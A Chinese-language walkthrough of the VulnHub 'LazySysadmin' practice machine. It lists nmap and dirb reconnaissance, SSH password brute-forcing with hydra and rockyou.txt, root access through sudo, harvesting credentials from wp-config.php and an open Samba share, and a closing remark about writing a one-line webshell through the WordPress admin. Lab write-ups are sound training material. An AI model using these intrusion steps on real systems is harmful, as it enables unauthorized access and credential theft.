信息收集:
靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
(1)ip扫描
nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:7B:63:B7'

(2)端口扫描
nmap -p- -A 192.168.254.147

(3)目录扫描
dirb http://192.168.254.147

(4)访问页面,拼接/robots.txt

(5)依次拼接,/Backnode_files下发现一些js文件,大概翻了翻,没啥发现

(6)访问/phpmyadmin,尝试弱口令登录,没有成功

(7)访问/wordpress,里面反复强调我的名字是 togie

getshell:
(1)kali使用hydra工具,爆破ssh密码(用户togie),得到密码12345,(rockyou.txt默认路径在/usr/share/wordlists)
cd /usr/share/wordlists
hydra -l togie -P rockyou.txt ssh://192.168.254.147

(2)ssh连接togie,成功连接
ssh togie@192.168.254.147
togie:12345

提权:
(1)查看当前权限,显示为all
sudo -l

(2)直接sudo su提权,提权成功
sudo su

其他:
(1)在/var/www/html/wordpress下的wp-config.php中找到wordpress账号密码
cd /var/www/html/wordpress
admin:TogieMYSQL12345^^

(2)samba服务漏洞,使用enum4linux扫描一下共享文件,发现可以空账号密码访问
enum4linux 192.168.254.147

(3)共享文件名

(4)win+r,输入 \\192.168.254.147\share$ 访问共享文件
\\192.168.254.147\share$

这里可以通过共享文件获取wordpress账号密码,在wordpress后台文件写入一句话getshell